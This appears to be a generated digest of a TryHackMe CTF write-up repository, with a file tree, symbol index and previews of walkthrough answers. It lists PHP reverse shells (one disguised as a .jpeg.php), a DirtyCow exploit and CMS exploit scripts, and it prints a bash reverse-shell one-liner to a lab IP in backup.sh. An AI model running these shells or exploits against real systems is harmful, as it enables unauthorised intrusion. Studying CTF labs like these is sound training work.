├── Wgel-CTF/
│ └── README.md
├── What-the-Shell?/
│ └── README.md
├── Windows-PrivEsc/
│ └── README.md
├── Wireshark-101/
│ └── README.md
├── XXE/
│ └── README.md
├── Year-of-the-Rabbit/
│ └── README.md
├── ZTH:-Obscure-Web-Vulns/
│ └── README.md
├── ZTH:-Web_2/
│ └── README.md
├── Zero-Logon/
│ └── README.md
├── cc-pentesting/
│ └── README.md
├── crack-the-hash/
│ ├── hash1_4.txt
│ ├── hash2_1.txt
│ ├── hash2_2.txt
│ └── hash2_3.txt
├── iOS-Forensics/
│ └── README.md
├── ignite/
│ ├── 47138.py
│ ├── fuel-cms-exploit.py
│ └── revshell.php
├── kenobi/
│ ├── id_rsa
│ └── log.txt
├── lianyu/
│ ├── exiftool_Queens_Gambit-output.txt
│ ├── exiftool_aa-output.txt
│ ├── exiftool_leave-me-alone-output.txt
│ ├── exploit
│ ├── exploit.c
│ ├── exploit.c.save
│ ├── gobuster-output.txt
│ ├── gobuster-output2.txt
│ ├── gobuster-output3.txt
│ ├── nmap-output.txt
│ └── ss/
│ ├── passwd.txt
│ └── shado
└── tomghost/
└── README.md
SYMBOL INDEX (15 symbols across 10 files)
FILE: Advent-of-Cyber-2020/Day-02-The_Elf_Strikes_Back!/reverse.jpeg.php
function printit (line 183) | function printit ($string) {
FILE: Advent-of-Cyber-2020/Day-04-Santa's_watching/create_list.py
function pad_number (line 8) | def pad_number(inp, length):
FILE: Advent-of-Cyber-2020/Day-13-Coal_for_Christmas/dirty.c
type stat (line 53) | struct stat
type Userinfo (line 55) | struct Userinfo {
type Userinfo (line 69) | struct Userinfo
function copy_file (line 87) | int copy_file(const char *from, const char *to) {
function main (line 121) | int main(int argc, char *argv[])
FILE: JavaScript-Basics/sort.js
function sort (line 2) | function sort(array) {
FILE: LazyAdmin/rshell.php
function printit (line 183) | function printit ($string) {
FILE: OWASP-Top-10/rce.py
class rce (line 9) | class rce(object):
method __reduce__ (line 10) | def __reduce__(self):
FILE: ignite/47138.py
function find_nth_overlapping (line 15) | def find_nth_overlapping(haystack, needle, n):
FILE: ignite/fuel-cms-exploit.py
function find_nth_overlapping (line 15) | def find_nth_overlapping(haystack, needle, n):
FILE: ignite/revshell.php
function printit (line 183) | function printit ($string) {
FILE: lianyu/exploit.c
function main (line 23) | int main(int argc,char *argv[], char ** envp)
Condensed preview — 230 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (953K chars).
[
{
"path": ".github/FUNDING.yml",
"chars": 150,
"preview": "github: edoardottt\nliberapay: edoardottt\npatreon: edoardottt\nko_fi: edoardottt\nopen_collective: edoardottt\ncustom: \"http"
},
{
"path": ".github/ISSUE_TEMPLATE/bug_report.md",
"chars": 105,
"preview": "---\nname: Bug report\nabout: Create a report to help us improve\ntitle: ''\nlabels: ''\nassignees: ''\n\n---\n\n\n"
},
{
"path": ".github/auto_assign.yml",
"chars": 401,
"preview": "# Set to true to add reviewers to pull requests\naddReviewers: true\n\n# A list of reviewers to be added to pull requests ("
},
{
"path": "Active-Directory-Basics/README.md",
"chars": 2164,
"preview": "# Active Directory Basics\n\n- I understand what Active Directory is and why it is used.\n\n\t no answer needed\n\n- What data"
},
{
"path": "Advent-of-Cyber-2020/Day-01-A_Christmas_Crisis/README.md",
"chars": 1407,
"preview": "# Day 1 - A Christmas Crisis\n\n- **Deploy your AttackBox (the blue \"Start AttackBox\" button)** and the tasks machine (gre"
},
{
"path": "Advent-of-Cyber-2020/Day-02-The_Elf_Strikes_Back!/README.md",
"chars": 869,
"preview": "# Day 2 - The Elf Strikes Back!\n\n- What string of text needs added to the URL to get access to the upload page?\n\n\t- `?id"
},
{
"path": "Advent-of-Cyber-2020/Day-02-The_Elf_Strikes_Back!/reverse.jpeg.php",
"chars": 5488,
"preview": "<?php\n// php-reverse-shell - A Reverse Shell implementation in PHP\n// Copyright (C) 2007 pentestmonkey@pentestmonkey.net"
},
{
"path": "Advent-of-Cyber-2020/Day-03-Christmas_Chaos/README.md",
"chars": 2855,
"preview": "# Day 3 - Christmas Chaos\n\n- Deploy your AttackBox (the blue \"Start AttackBox\" button) and the tasks machine (green butt"
},
{
"path": "Advent-of-Cyber-2020/Day-04-Santa's_watching/README.md",
"chars": 2240,
"preview": "# Day 4 - Santa's watching\n\nOur malicious, despicable, vile, cruel, contemptuous, evil hacker has defaced Elf's forums a"
},
{
"path": "Advent-of-Cyber-2020/Day-04-Santa's_watching/create_list.py",
"chars": 461,
"preview": "#!/usr/bin/python3\n'''\n@author edoardottt\n'''\nstarting_year = 2010\ncurrent_year = 2020\n\ndef pad_number(inp, length):\n "
},
{
"path": "Advent-of-Cyber-2020/Day-05-Someone_stole_Santa's_gift_list!/README.md",
"chars": 1386,
"preview": "# Day 5 - Someone stole Santa's gift list!\n\n- Without using directory brute forcing, what's Santa's secret login panel?\n"
},
{
"path": "Advent-of-Cyber-2020/Day-06-Be_careful_with_what_you_wish_on_a_Christmas_night/README.md",
"chars": 1250,
"preview": "# Day 6 - Be careful with what you wish on a Christmas night\n\n- Deploy your AttackBox (the blue \"Start AttackBox\" button"
},
{
"path": "Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/%2f",
"chars": 4532,
"preview": "<!DOCTYPE html>\n<html lang=\"en\">\n <head>\n <meta charset=\"utf-8\" />\n<title>TBFC's Internal Blog</title>\n\n\n \n\n\n\n<"
},
{
"path": "Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/README.md",
"chars": 1107,
"preview": "# The Grinch Really Did Steal Christmas\n\nDownload the ZIP file \"aocpcaps.zip\" that is attached to this task, use a combi"
},
{
"path": "Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/elf_mcskidy_wishlist.txt",
"chars": 133,
"preview": "Wish list for Elf McSkidy\r\n-------------------------\r\nBudget: £100\r\n\r\nx3 Hak 5 Pineapples\r\nx1 Rubber ducky (to replace E"
},
{
"path": "Advent-of-Cyber-2020/Day-08-What's_Under_the_Christmas_Tree?/README.md",
"chars": 1284,
"preview": "# What's unders the Christmas Tree?\n\n\n- When was Snort created?\n\n\t- A Google search is enough (as always...).\n\t- `1998`\n"
},
{
"path": "Advent-of-Cyber-2020/Day-09-Anyone_can_be_Santa!/README.md",
"chars": 1276,
"preview": "# Anyone can be Santa!\n\nBefore we begin, we're going to need to deploy two Instances:\n\n\t1. The THM AttackBox by pressing"
},
{
"path": "Advent-of-Cyber-2020/Day-09-Anyone_can_be_Santa!/backup.sh",
"chars": 43,
"preview": "bash -i >& /dev/tcp/10.9.126.198/4444 0>&1\n"
},
{
"path": "Advent-of-Cyber-2020/Day-09-Anyone_can_be_Santa!/old_backup.sh",
"chars": 341,
"preview": "#!/bin/bash\n\n# Created by ElfMcEager to backup all of Santa's goodies!\n\n# Create backups to include date DD/MM/YYYY\nfile"
},
{
"path": "Advent-of-Cyber-2020/Day-09-Anyone_can_be_Santa!/shoppinglist.txt",
"chars": 24,
"preview": "The Polar Express Movie\n"
},
{
"path": "Advent-of-Cyber-2020/Day-10-Dont-be-sElfish/README.md",
"chars": 752,
"preview": "# Don't be sElfish!\n\nBefore we begin, we're going to need to deploy two Instances:\n\n\t1. The THM AttackBox by pressing th"
},
{
"path": "Advent-of-Cyber-2020/Day-10-Dont-be-sElfish/note_from_mcskidy.txt",
"chars": 143,
"preview": "Hi Santa, I decided to put all of your favourite jingles onto this share - allowing you access it from anywhere you like"
},
{
"path": "Advent-of-Cyber-2020/Day-11-The_Rogue_Gnome/LinEnum.sh",
"chars": 46631,
"preview": "#!/bin/bash\n#A script to enumerate local information from a Linux host\nversion=\"version 0.982\"\n#@rebootuser\n\n#help funct"
},
{
"path": "Advent-of-Cyber-2020/Day-11-The_Rogue_Gnome/README.md",
"chars": 1542,
"preview": "# The Rogue Gnome\n\nBefore we begin, we're going to need to deploy two Instances:\n\n\t1. The THM AttackBox by pressing the "
},
{
"path": "Advent-of-Cyber-2020/Day-12-Ready,_set,_elf./README.md",
"chars": 1030,
"preview": "# Ready, set, elf.\n\n\n- What is the version number of the web server?\n\n\t- `nmap -sV <TARGET_IP>` (Remember, if it says \"h"
},
{
"path": "Advent-of-Cyber-2020/Day-13-Coal_for_Christmas/README.md",
"chars": 1571,
"preview": "# Coal for Christmas\n\n- Hi Santa, hop in your sleigh and deploy this machine!\n\n\t no answer needed\n\n- nmap <TARGET_IP>\n\n"
},
{
"path": "Advent-of-Cyber-2020/Day-13-Coal_for_Christmas/dirty.c",
"chars": 4816,
"preview": "//\n// This exploit uses the pokemon exploit of the dirtycow vulnerability\n// as a base and automatically generates a new"
},
{
"path": "Advent-of-Cyber-2020/Day-14-Where's Rudolph?/README.md",
"chars": 1592,
"preview": "# Where's Rudolph?\n\n- What URL will take me directly to Rudolph's Reddit comment history?\n\n\t- Google is your best friend"
},
{
"path": "Advent-of-Cyber-2020/Day-15-There's a Python in my stocking!/README.md",
"chars": 598,
"preview": "# There's a Python in my stocking!\n\n- What's the output of True + True?\n\n\t- `2`\n\n- What's the database for installing ot"
},
{
"path": "Advent-of-Cyber-2020/Day-16-Help! Where is Santa?/README.md",
"chars": 799,
"preview": "# Help! Where is Santa?\n\nOh no! Santa 🎅 has taken off, leaving you -- the faithful elves behind! Can you help find Santa"
},
{
"path": "Advent-of-Cyber-2020/Day-16-Help! Where is Santa?/api_fuzzer.py",
"chars": 270,
"preview": "import requests\n\nTARGET_API = \"HERE YOUR TARGET_IP\"\n\nfor i in range(0, 100):\n if i %2 == 1:\n response = reques"
},
{
"path": "Advent-of-Cyber-2020/Day-17-ReverseELFneering/README.md",
"chars": 850,
"preview": "# ReverseELFneering\n\nUsername: elfmceager\n\nPassword: adventofcyber\n\nUse your new-found knowledge of Radare2 to analyse t"
},
{
"path": "Advent-of-Cyber-2020/Day-18-The_Bits_of_Christmas/README.md",
"chars": 1056,
"preview": "# The Bits of Christmas\n\n\nUsername: `cmnatic`\n\nPassword: `Adventofcyber!`\n\n\n- Open the \"TBFC_APP\" application in ILspy a"
},
{
"path": "Advent-of-Cyber-2020/Day-19-The_Naughty_or_Nice_List/README.md",
"chars": 4471,
"preview": "# The Naughty or Nice List\n\n![santalist](https://github.com/edoardottt/tryhackme-ctf/blob/main/Advent-of-Cyber-2020/Day-"
},
{
"path": "Advent-of-Cyber-2020/Day-20-PowershELlF_to_the_rescue/README.md",
"chars": 1733,
"preview": "# PowershELlF to the rescue\n\n- Search for the first hidden elf file within the Documents folder. Read the contents of th"
},
{
"path": "Advent-of-Cyber-2020/Day-21-Time_for_some_ELForensics/README.md",
"chars": 1005,
"preview": "# Time for some ELForensics\n\nUser name: `littlehelper`\nUser password: `iLove5now!`\n\nOpen Remmina and connect yourself to"
},
{
"path": "Advent-of-Cyber-2020/Day-22-Elf_McEager_becomes_CyberElf/README.md",
"chars": 2778,
"preview": "# Elf McEager becomes CyberElf\n\nFor Server provide (<TARGET_IP>) as the IP address provided to you for the remote machin"
},
{
"path": "Advent-of-Cyber-2020/Day-23-The_Grinch_strikes_again!/README.md",
"chars": 1451,
"preview": "# The Grinch strikes again!\n\n![win10-ransom](https://github.com/edoardottt/tryhackme-ctf/blob/main/Advent-of-Cyber-2020/"
},
{
"path": "Advent-of-Cyber-2020/Day-24-The_Trial_Before_Christmas/README.md",
"chars": 5357,
"preview": "# The Trial Before Christmas\n\n- Scan the machine. What ports are open?\n\n\t- `scilla port -target <TARGET_IP>`, [scilla he"
},
{
"path": "Advent-of-Cyber-2020/README.md",
"chars": 579,
"preview": "# Advent of Cyber 2020 🎄🎅\n\n## [tryhackme.com/edoardottt](https://tryhackme.com/p/edoardottt)\n\n![advent](https://github.c"
},
{
"path": "Advent-of-Cyber-2021/Day-01-Save_The_Gifts/README.md",
"chars": 803,
"preview": "# Day 1 - Save the gifts\n\nThe trick is to change the user id until you find the correct one.\n\n- After finding Santa's ac"
},
{
"path": "Advent-of-Cyber-2021/Day-02-Elf_HR_Problems/README.md",
"chars": 1388,
"preview": "# Day 2 Elf HR Problems\n\n- Open the static site in a new tab, here.\n\n\t\tno answer needed\n\n- Register an account, and veri"
},
{
"path": "Advent-of-Cyber-2021/Day-03-Christmas_Blackout/README.md",
"chars": 455,
"preview": "# Day 3 - Christmas Blackout\n\n\n- Using a common wordlist for discovering content, enumerate http://MACHINE_IP to find th"
},
{
"path": "Advent-of-Cyber-2021/Day-04-Santas_Running_Behind/README.md",
"chars": 392,
"preview": "# Day 4 - Santa's Running Behind\n\n\n\n- Access the login form at http://MACHINE_IP\n\n\t\tNo answer needed\n\n- Configure Burp S"
},
{
"path": "Advent-of-Cyber-2021/Day-05-Pesky_Elf_Forum/README.md",
"chars": 105,
"preview": "# Day 5 - Pesky Elf Forum\n\n\n- What flag did you get when you disabled the plugin?\n\n\t- `*****************`"
},
{
"path": "Advent-of-Cyber-2021/Day-06-Patch_Management_Is_Hard/README.md",
"chars": 1351,
"preview": "# Day 6 - Patch Management Is Hard\n\n- Deploy the attached VM and look around. What is the entry point for our web applic"
},
{
"path": "Advent-of-Cyber-2021/Day-07-Migration_Without_Security/README.md",
"chars": 825,
"preview": "# Day 7 - Migration Without Security\n\n- Interact with the MongoDB server to find the flag. What is the flag?\n\n - `***{*"
},
{
"path": "Advent-of-Cyber-2021/Day-08-Santas_Bag_of_Toys/README.md",
"chars": 5904,
"preview": "# Day 8 - Santa's Bag of Toys\n\n\nRead the premise above, start the attached Windows analysis machine and find the transcr"
},
{
"path": "Advent-of-Cyber-2021/Day-09-Where_Is_All_This_Data_Going/README.md",
"chars": 774,
"preview": "# Day 9 - Where Is All This Data Going\n\n- In the HTTP #1 - GET requests section, which directory is found on the web ser"
},
{
"path": "Advent-of-Cyber-2021/Day-10-Offensive_Is_The_Best_Defence/README.md",
"chars": 1647,
"preview": "# Day10 - Offensive Is The Best Defence\n\n- Help McSkidy and run nmap -sT MACHINE_IP. How many ports are open between 1 a"
},
{
"path": "Advent-of-Cyber-2021/Day-11-Where_Are_The_Reindeers/README.md",
"chars": 1049,
"preview": "# Day 11 - Where Are The Reindeers?\n\n- There is an open port related to MS SQL Server accessible over the network. What "
},
{
"path": "Advent-of-Cyber-2021/Day-12-Sharing_Without_Caring/README.md",
"chars": 981,
"preview": "Day12 - Sharing Without Caring\n\n- Scan the target server with the IP 10.10.112.197. Remember that MS Windows hosts block"
},
{
"path": "Advent-of-Cyber-2021/Day-13-They_Lost_The_Plan/README.md",
"chars": 679,
"preview": "# Day 13 - They Lost The Plan!\n\n\n- Complete the username: p.....\n\n\t- `*****`\n\n- What is the OS version?\n\n\t- `***********"
},
{
"path": "Advent-of-Cyber-2021/Day-14-Dev(Insecure)Ops/README.md",
"chars": 376,
"preview": "Day 14 - Dev(Insecure)Ops\n\n\n- How many pages did the dirb scan find with its default wordlist?\n\n\t- `*`\n\n- How many scrip"
},
{
"path": "Advent-of-Cyber-2021/Day-15-The_Grinchs_day_off/README.md",
"chars": 30,
"preview": "# Day 15 - The Grinchs day off"
},
{
"path": "Advent-of-Cyber-2021/Day-16-Ransomware_Madness/README.md",
"chars": 679,
"preview": "# Day 16 - Ransomware Madness\n\n- !!! ВАЖНЫЙ !!!\n\n\t\tNo answer needed\n\n- What is the operator's username?\n\n\t- `***********"
},
{
"path": "Advent-of-Cyber-2021/Day-17-Elf_Leaks/README.md",
"chars": 767,
"preview": "# Day 17 - Elf Leaks\n\n\n- What is the name of the S3 Bucket used to host the HR Website announcement?\n\n\t- `******.*******"
},
{
"path": "Advent-of-Cyber-2021/Day-18-Playing_With_Containers/README.md",
"chars": 500,
"preview": "# Day 18 - Playing With Containers\n\n- What command will list container images stored in your local container registry?\n\n"
},
{
"path": "Advent-of-Cyber-2021/Day-19-Something_Phishy_Is_Going_On/README.md",
"chars": 1402,
"preview": "# Day 19 - Something Phishy Is Going On\n\n- Who was the email sent to? (Answer is the email address)\n\n\t- `***************"
},
{
"path": "Advent-of-Cyber-2021/Day-20-What_s_the_Worst_That_Could_Happen/README.md",
"chars": 1108,
"preview": "# Day 20 - What's the Worst That Could Happen?\n\n- Open the terminal and navigate to the file on the desktop named 'testf"
},
{
"path": "Advent-of-Cyber-2021/Day-21-Needles_In_Computer_Stacks/README.md",
"chars": 859,
"preview": "# Day 21 - Needles In Computer Stacks\n\n- We changed the text in the string $a as shown in the eicaryara rule we wrote, f"
},
{
"path": "Advent-of-Cyber-2021/Day-22-How_It_Happened/README.md",
"chars": 688,
"preview": "# Day 22 - How It Happened\n\n- What is the username (email address of Grinch Enterprises) from the decoded script?\n\n\t- `*"
},
{
"path": "Advent-of-Cyber-2021/Day-23-PowershELlF_Magic/README.md",
"chars": 881,
"preview": "# Day 23 - PowershELlF Magic\n\n- What command was executed as Elf McNealy to add a new user to the machine?\n\n\t- `********"
},
{
"path": "Advent-of-Cyber-2021/Day-24-Learning_From_The_Grinch/README.md",
"chars": 239,
"preview": "# Day 24 - Learning From The Grinch\n\n- What is the username of the other user on the system?\n\n\t- `*****`\n\n- What is the "
},
{
"path": "Advent-of-Cyber-2021/README.md",
"chars": 416,
"preview": "# Advent of Cyber 2021 🎄🎅\n\n## [tryhackme.com/edoardottt](https://tryhackme.com/p/edoardottt)\n\n\n![aoc-logo](https://githu"
},
{
"path": "Agent-Sudo/README.md",
"chars": 1879,
"preview": "# Agent Sudo\n\n\n- Deploy the machine\n\n\t no answer needed\n\n- How many open ports?\n\n\t- `nmap <TARGET_IP>`\n\t- `3`\n\n- How yo"
},
{
"path": "Agent-Sudo/To_agentJ.txt",
"chars": 217,
"preview": "Dear agent J,\n\nAll these alien like photos are fake! Agent R stored the real picture inside your directory. Your login p"
},
{
"path": "Agent-Sudo/_cutie.png.extracted/To_agentR.txt",
"chars": 86,
"preview": "Agent C,\n\nWe need to send the picture to 'QXJlYTUx' as soon as possible!\n\nBy,\nAgent R\n"
},
{
"path": "Agent-Sudo/_cutie.png.extracted/zip.hash",
"chars": 279,
"preview": "8702.zip/To_agentR.txt:$zip2$*0*1*0*4673cae714579045*67aa*4e*61c4cf3af94e649f827e5964ce575c5f7a239c48fb992c8ea8cbffe51d0"
},
{
"path": "Agent-Sudo/message.txt",
"chars": 181,
"preview": "Hi james,\n\nGlad you find this message. Your login password is hackerrules!\n\nDon't ask me why the password look cheesy, a"
},
{
"path": "Anonymous/README.md",
"chars": 683,
"preview": "# Anonymous\n\n- Enumerate the machine. How many ports are open?\n\n\t- `scilla port -target <TARGET_IP>`\n\t- `*`\n\n- What ser"
},
{
"path": "Attacking-Kerberos/README.md",
"chars": 2789,
"preview": "# Attacking Kerberos\n\n- What does TGT stand for?\n\n\t- `ticket granting ticket`\n\n- What does SPN stand for?\n\n\t- `service p"
},
{
"path": "Attacktive-Directory/README.md",
"chars": 2788,
"preview": "# Attacktive Directory\n\n- Initiate the VPN connection and deploy the machine!\n\n\t no answer needed\n\n- Read and follow al"
},
{
"path": "Authenticate/README.md",
"chars": 1026,
"preview": "# Authenticate\n\n- Deploy the VM\n\n\t no answer needed\n\n- What is the flag you found after logging as Jack?\n\n\t- `fad9d****"
},
{
"path": "Avengers-Blog/README.md",
"chars": 1045,
"preview": "# Avengers Blog\n\n- Connect to our network by going to your access page. This is important as you will not be able to acc"
},
{
"path": "Baron-Samedit/README.md",
"chars": 508,
"preview": "# Baron Samedit\n\n- Deployed!\n\n\t no answer needed\n\n- After compiling the exploit, what is the name of the executable cre"
},
{
"path": "Bash-Scripting/README.md",
"chars": 1366,
"preview": "# Bash Scripting\n\n- Are you ready to go!\n\n\t no answer needed\n\n- What piece of code can we insert at the start of a line"
},
{
"path": "Bebop/README.md",
"chars": 754,
"preview": "# Bebop\n\n- Deploy the machine\n\n\t no answer needed\n\n- What is your codename?\n\n\t- `pilot`\n\n- What is the User Flag?\n\n\t- `"
},
{
"path": "Bolt/README.md",
"chars": 1233,
"preview": "# Bolt\n\n- Start the machine\n\n\t no answer needed\n\n- What port number has a web server with a CMS running?\n\n\t- `nmap -sV"
},
{
"path": "Bounty-Hacker/README.md",
"chars": 1231,
"preview": "# Bounty Hacker\n\nYou were boasting on and on about your elite hacker skills in the bar and a few Bounty Hunters decided "
},
{
"path": "Bounty-Hacker/locks.txt",
"chars": 418,
"preview": "rEddrAGON\nReDdr4g0nSynd!cat3\nDr@gOn$yn9icat3\nR3DDr46ONSYndIC@Te\nReddRA60N\nR3dDrag0nSynd1c4te\ndRa6oN5YNDiCATE\nReDDR4g0n5y"
},
{
"path": "Bounty-Hacker/task.txt",
"chars": 68,
"preview": "1.) Protect Vicious.\n2.) Plan for Red Eye pickup on the moon.\n\n-lin\n"
},
{
"path": "Brooklyn-Nine-Nine/README.md",
"chars": 546,
"preview": "# Brooklyn Nine Nine\n\n- User flag\n\n\t- `scilla port -p -1000 <TARGET_IP>`\n\t- Three ports open.\n\t- `ftp <TARGET_IP>` with "
},
{
"path": "Brute-It/README.md",
"chars": 1429,
"preview": "# Brute It\n\n- Deploy the machine\n\n\t no answer needed\n\n- How many ports are open?\n\n\t- `nmap -p- <TARGET_IP>` or\n\t- `scil"
},
{
"path": "Burp-Suite/README.md",
"chars": 12761,
"preview": "# Burp Suite\n\n- Read the overview and continue on into installation!\n\n\t no answer needed\n\n- If you'll be installing Bur"
},
{
"path": "CC:-Radare2/README.md",
"chars": 4794,
"preview": "# CC: Radare2\n\n- Read the above \n\n\t no answer needed\n\n- What flag you set to analyze the binary upon entering the r2 co"
},
{
"path": "CTF-collection-Vol.1/README.md",
"chars": 2878,
"preview": "# CTF collection Vol.1\n\n- High five!\n\n\t no answer needed\n\n- Feed me the flag!\n\n\t- `echo \"VEhNe2p1NTdfZDNjMGQzXzdoM19iND"
},
{
"path": "Chill-Hack/README.md",
"chars": 2443,
"preview": "# Chill Hack\n\n- User Flag\n\n\t- `scilla port -target <TARGET_IP> -p -1000`\n\t- `ftp <TARGET_IP>`\n\t- `anonymous`, no passwor"
},
{
"path": "Common-Linux-Privesc/README.md",
"chars": 5938,
"preview": "# Common Linux Privesc\n\n- Deploy the machine\n\n\t no answer needed\n\n- Read the information about privilege escalation\n\n\t "
},
{
"path": "Cross-site-Scripting/README.md",
"chars": 2659,
"preview": "# Cross-site Scripting\n\n- Read the introduction.\n\n\t no answer needed\n\n- Deploy the machine and navigate to http://<TARG"
},
{
"path": "Cyborg/README.md",
"chars": 1275,
"preview": "# Cyborg\n\n- Deploy the machine\n\n\t no answer needed\n\n- Scan the machine, how many ports are open?\n\n\t- `scilla port -targ"
},
{
"path": "Easy-Peasy/README.md",
"chars": 2630,
"preview": "# Easy Peasy\n\n- How many ports are open?\n\n\t- `nmap <TARGET_IP>`\n\t- `3`\n\n- What is the version of nginx?\n\n\t- `nmap -sV <T"
},
{
"path": "Easy-Peasy/easypeasy.txt",
"chars": 48856,
"preview": "123456\r\n12345\r\n123456789\r\npassword\r\niloveyou\r\nprincess\r\n1234567\r\nrockyou\r\nlouise\r\norange\r\n789456\r\n999999\r\nshorty\r\n11111\r"
},
{
"path": "Easy-Peasy/hash.txt",
"chars": 64,
"preview": "940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81"
},
{
"path": "Easy-Peasy/secrettext.txt",
"chars": 278,
"preview": "username:boring\npassword:\n01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 0110"
},
{
"path": "Encryption-Crypto-101/README.md",
"chars": 2350,
"preview": "# Encryption - Crypto 101\n\n- I'm ready to learn about encryption\n\n\t no answer needed\n\n- I agree not to complain too muc"
},
{
"path": "Erit-Securus-I/README.md",
"chars": 1369,
"preview": "# Erit Securus I\n\n- Deploy box\n\n\t no answer needed\n\n- How many ports are open?\n\n\t- `scilla port -target <TARGET_IP>`\n\t-"
},
{
"path": "Game-Zone/README.md",
"chars": 1648,
"preview": "# Game Zone\n\n- Deploy the machine and access its web server.\n\n\t no answer needed\n\n- What is the name of the large carto"
},
{
"path": "GamingServer/README.md",
"chars": 1375,
"preview": "# GamingServer\n\n- What is the user flag?\n\n\t- Visit `http://<TARGET_IP>`.\n\t- `scilla port -target <TARGET_IP> -p -1000`\n\t"
},
{
"path": "Geolocating-Images/README.md",
"chars": 746,
"preview": "# Geolocating Images\n\n- Download the zip file\n\n\tno answer needed\n\n- Where in the world is image 1? The answer is the cou"
},
{
"path": "Getting-Started/README.md",
"chars": 260,
"preview": "# Getting Started\n\n- What is the name of the hidden admin page?\n\n\t- Inspect page source code\n\t- `/test-admin`\n\n- What i"
},
{
"path": "GoldenEye/README.md",
"chars": 3228,
"preview": "# GoldenEye\n\n\n\n- First things firs"
},
{
"path": "Gotta-Catch'em-All/README.md",
"chars": 1396,
"preview": "# Gotta Catch'em All!\n\n- Find the Grass-Type Pokemon\n\n\t- `nmap -sV <TARGET_IP>`\n\t- `<pokemon>:<hack_the_pokemon>` in the"
},
{
"path": "Hacking-with-Powershell/README.md",
"chars": 3015,
"preview": "# Hacking with Powershell\n\n- Read the above and deploy the machine!\n\n\t no answer needed\n\n- What is the command to get h"
},
{
"path": "Hardening-Basics-Part-1/README.md",
"chars": 2547,
"preview": "# Hardening Basics Part 1\n\n- Deploy the VM and let's get started!\n\n\t no answer needed\n\n- No questions\n\n\t no answer nee"
},
{
"path": "Hardening-Basics-Part-2/README.md",
"chars": 1711,
"preview": "# Hardening Basics Part 2\n\n- Deploy the VM if necessary and let's go!\n\n\t no answer needed\n\n- Which SSH Protocol version "
},
{
"path": "Hashing-Crypto_101/README.md",
"chars": 1873,
"preview": "# Hashing - Crypto 101\n\n- Is base64 encryption or encoding?\n\n\t- `encoding`\n\n- What is the output size in bytes of the MD"
},
{
"path": "HeartBleed/README.md",
"chars": 303,
"preview": "# HeartBleed\n\n- Read above and ensure you have a good understanding of how the Heartbleed vulnerability works.\n\n\t no an"
},
{
"path": "Intro-PoC-Scripting/README.md",
"chars": 1802,
"preview": "# Intro PoC Scripting\n\n- Please read the introduction description\n\n\t no answer needed\n\n- What is the target's platform "
},
{
"path": "Intro-to-Python/README.md",
"chars": 957,
"preview": "# Intro to Python\n\n- Section Complete\n\n\t no answer needed\n\n- Section Complete\n\n\t no answer needed\n\n- What is the name "
},
{
"path": "Intro-to-Python/decode.py",
"chars": 302,
"preview": "import base64\n\nwith open(\"encodedflag.txt\", \"r\") as f:\n\t\tencoded_flag = f.read()\n\nfor i in range(5):\n\tencoded_flag = bas"
},
{
"path": "Intro-to-Windows/README.md",
"chars": 1155,
"preview": "# Intro to Windows\n\n- Read a little about Windows history and versions.\n\n\t no answer needed\n\n- When was Windows announc"
},
{
"path": "Introduction-to-Django/README.md",
"chars": 830,
"preview": "# Introduction to Django\n\n- Read the above.\n\n\t no answer needed\n\n- How would we create an app called Forms?\n\n\t- `python"
},
{
"path": "Introduction-to-Flask/README.md",
"chars": 803,
"preview": "# Introduction to Flask\n\n- Let's go!\n\n\t no answer needed\n\n- Which environment variable do you need to change in order t"
},
{
"path": "Introduction-to-OWASP-ZAP/README.md",
"chars": 969,
"preview": "# Introduction to OWASP ZAP\n\n- What does ZAP stand for?\n\n\t- `Zed Attack proxy`\t\n\n- Connect to the TryHackMe network and "
},
{
"path": "Introductory-Networking/README.md",
"chars": 5207,
"preview": "# Introductory Networking\n\n- Let's get started!\n\n\t no answer needed\n\n- Which layer would choose to send data over TCP o"
},
{
"path": "JavaScript-Basics/README.md",
"chars": 1125,
"preview": "# JavaScript Basics\n\n- Let's Begin\n\n\t no answer needed\n\n- What type of data type is this: 'Neo'?\n\n\t- `string`\n\n- What d"
},
{
"path": "JavaScript-Basics/sort.js",
"chars": 302,
"preview": "\nfunction sort(array) {\n\tfor (var i=1; i<array.length;i++) {\n\t\tfor (var j=0; j<i;j++) {\n\t\t\tif (array[i] < array[j]) {\n\t\t"
},
{
"path": "John-The-Ripper/README.md",
"chars": 2954,
"preview": "# John The Ripper\n\n- Read and understand the basic concepts of hashing and hash cracking\n\n\t no answer needed\n\n- What is"
},
{
"path": "Jurassic-Park/README.md",
"chars": 1492,
"preview": "# Jurassic Park\n\n- What is the SQL database called which is serving the shop information?\n\n\t- `scilla port -target <TARG"
},
{
"path": "LFI/README.md",
"chars": 1307,
"preview": "# LFI\n\n- Deploy the VM and access its web server: `http://<TARGET_IP>`\n\n\t no answer needed\n\n- Look around the website. "
},
{
"path": "LFI-Basics/README.md",
"chars": 2571,
"preview": "# LFI Basics\n\n- Start the VM and access it using your browser.\n\n\t no answer needed\n\n- Access the first walkthrough, and"
},
{
"path": "LICENSE",
"chars": 35149,
"preview": " GNU GENERAL PUBLIC LICENSE\n Version 3, 29 June 2007\n\n Copyright (C) 2007 Free "
},
{
"path": "LazyAdmin/README.md",
"chars": 3026,
"preview": "# LazyAdmin\n\nHave some fun! There might be multiple ways to get user access.\n\n- What is the user flag?\n\n\t- `nmap -sV -sC"
},
{
"path": "LazyAdmin/hash.txt",
"chars": 32,
"preview": "42f749ade7f9e195bf475f37a44cafcb"
},
{
"path": "LazyAdmin/mysql_bakup_20191129023059-1.5.1.sql",
"chars": 4809,
"preview": "<?php return array (\n 0 => 'DROP TABLE IF EXISTS `%--%_attachment`;',\n 1 => 'CREATE TABLE `%--%_attachment` (\n `id` i"
},
{
"path": "LazyAdmin/rshell.php",
"chars": 5473,
"preview": "<?php\n// php-reverse-shell - A Reverse Shell implementation in PHP\n// Copyright (C) 2007 pentestmonkey@pentestmonkey.net"
},
{
"path": "Linux-Challenges/README.md",
"chars": 5818,
"preview": "# Linux Challenges\n\n- How many visible files can you see in garrys home directory?\n\n\t- `ssh garry@<TARGET_IP>` and enter"
},
{
"path": "Linux-Fundamentals/Linux-Fundamentals-Part-1/README.md",
"chars": 1465,
